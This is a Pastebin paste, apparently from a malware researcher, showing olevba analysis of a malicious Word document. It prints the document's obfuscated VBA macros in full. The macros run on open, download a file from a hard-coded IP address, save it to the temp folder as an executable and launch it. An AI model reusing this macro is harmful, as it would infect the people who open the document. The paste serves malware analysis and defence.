API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Apr 1st, 2015
557
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 6.00 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- 08.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 08.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 08.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen()
  16. M74TMHsK391U17
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Module1.bas
  27. in file: 08.doc - OLE stream: u'Macros/VBA/Module1'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Function RaSfP6r1363354I(ByVal PzRG5z7lX09IgN5jL2 As String, ByVal PF5ZVO1vjpV4jr0SV9QERY3q3 As String) As Boolean
  31. Dim sSt9btW4T0Q9CRYn As Object, PJZVvQ3ZZA As Long, JJ11x8 As Long, PN10dD65K61UuEYF53() As Byte
  32. Set sSt9btW4T0Q9CRYn = CreateObject(ChrW(38.5 + 38.5) & ChrW(41.5 + 41.5) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(25 + 25) & ChrW(23 + 23) & ChrW(44 + 44) & ChrW(38.5 + 38.5) & ChrW(38 + 38) & ChrW(36 + 36) & ChrW(42 + 42) & ChrW(42 + 42) & ChrW(40 + 40))
  33. sSt9btW4T0Q9CRYn.Open ChrW(35.5 + 35.5) & ChrW(34.5 + 34.5) & ChrW(42 + 42), PzRG5z7lX09IgN5jL2, False
  34. sSt9btW4T0Q9CRYn.Send "e"
  35. PN10dD65K61UuEYF53 _
  36.  = sSt9btW4T0Q9CRYn.responseBody
  37. JJ11x8 = FreeFile
  38. Open _
  39.  PF5ZVO1vjpV4jr0SV9QERY3q3 For _
  40.  Binary Access _
  41.  Write Lock Write As #JJ11x8
  42. Put #JJ11x8, , PN10dD65K61UuEYF53
  43. Close #JJ11x8
  44. Set GFCUTFUf87TGUbjdfgfdg = CreateObject(ChrW(41.5 + 41.5) & ChrW(52 + 52) & ChrW(50.5 + 50.5) & ChrW(54 + 54) & ChrW(54 + 54) & ChrW(23 + 23) & ChrW(32.5 + 32.5) & ChrW(56 + 56) & ChrW(56 + 56) & ChrW(54 + 54) & ChrW(52.5 + 52.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(58 + 58) & ChrW(52.5 + 52.5) & ChrW(55.5 + 55.5) & ChrW(55 + 55))
  45. GFCUTFUf87TGUbjdfgfdg.Open _
  46.  Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
  47. End Function
  48.  
  49. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  50. ANALYSIS:
  51. +------------+--------------+-----------------------------------------+
  52. | Type       | Keyword      | Description                             |
  53. +------------+--------------+-----------------------------------------+
  54. | Suspicious | CreateObject | May create an OLE object                |
  55. | Suspicious | Open         | May open a file                         |
  56. | Suspicious | Environ      | May read system environment variables   |
  57. | Suspicious | Write        | May write to a file (if combined with   |
  58. |            |              | Open)                                   |
  59. | Suspicious | Put          | May write to a file (if combined with   |
  60. |            |              | Open)                                   |
  61. | Suspicious | ChrW         | May attempt to obfuscate specific       |
  62. |            |              | strings                                 |
  63. | Suspicious | Binary       | May read or write a binary file (if     |
  64. |            |              | combined with Open)                     |
  65. +------------+--------------+-----------------------------------------+
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: 08.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  71. Sub M74TMHsK391U17()
  72. RaSfP6r1363354I ChrW(52 + 52) & ChrW(58 + 58) & ChrW(58 + 58) & ChrW(56 + 56) & ChrW(29 + 29) & ChrW(23.5 + 23.5) & ChrW(23.5 + 23.5) & ChrW(25.5 + 25.5) & ChrW(24.5 + 24.5) & ChrW(23 + 23) & ChrW(26 + 26) & ChrW(24.5 + 24.5) & ChrW(23 + 23) & ChrW(26 + 26) & ChrW(26.5 + 26.5) & ChrW(23 + 23) & ChrW(24.5 + 24.5) & ChrW(27.5 + 27.5) & ChrW(26.5 + 26.5) & ChrW(23.5 + 23.5) & ChrW(57.5 + 57.5) & ChrW(56.5 + 56.5) & ChrW(59.5 + 59.5) & ChrW(50.5 + 50.5) & ChrW(57 + 57) & ChrW(50.5 + 50.5) & ChrW(23.5 + 23.5) & ChrW(49.5 + 49.5) & ChrW(48.5 + 48.5) & ChrW(57.5 + 57.5) & ChrW(54.5 + 54.5) & ChrW(48.5 + 48.5) & ChrW(23 + 23) & ChrW(51.5 + 51.5) & ChrW(52.5 + 52.5) & ChrW(51 + 51), _
  73.  Environ(ChrW(42 + 42) & ChrW(34.5 + 34.5) & ChrW(38.5 + 38.5) & ChrW(40 + 40)) & ChrW(46 + 46) & ChrW(34 + 34) & ChrW(39.5 + 39.5) & ChrW(43.5 + 43.5) & ChrW(42.5 + 42.5) & ChrW(36.5 + 36.5) & ChrW(32.5 + 32.5) & ChrW(32.5 + 32.5) & ChrW(35 + 35) & ChrW(40.5 + 40.5) & ChrW(42 + 42) & ChrW(32.5 + 32.5) & ChrW(23 + 23) & ChrW(50.5 + 50.5) & ChrW(60 + 60) & ChrW(50.5 + 50.5)
  74. End Sub
  75. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  76. ANALYSIS:
  77. +------------+---------+-----------------------------------------+
  78. | Type       | Keyword | Description                             |
  79. +------------+---------+-----------------------------------------+
  80. | Suspicious | Environ | May read system environment variables   |
  81. | Suspicious | ChrW    | May attempt to obfuscate specific       |
  82. |            |         | strings                                 |
  83. +------------+---------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!